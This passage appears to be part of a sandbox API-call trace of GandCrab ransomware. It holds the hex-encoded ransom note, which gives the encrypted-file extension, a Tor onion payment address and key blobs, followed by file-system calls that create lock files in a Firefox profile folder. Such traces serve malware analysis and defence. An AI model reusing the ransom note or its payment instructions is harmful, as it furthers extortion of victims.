6\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.732] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0084.733] CloseHandle (hObject=0x2dc) returned 1 [0084.733] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.733] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.733] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1e, wMilliseconds=0x2a)) [0084.733] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.734] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.734] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.734] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock") returned 142 [0084.734] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0084.735] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.735] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.735] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\") returned 118 [0084.735] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="*" | out: 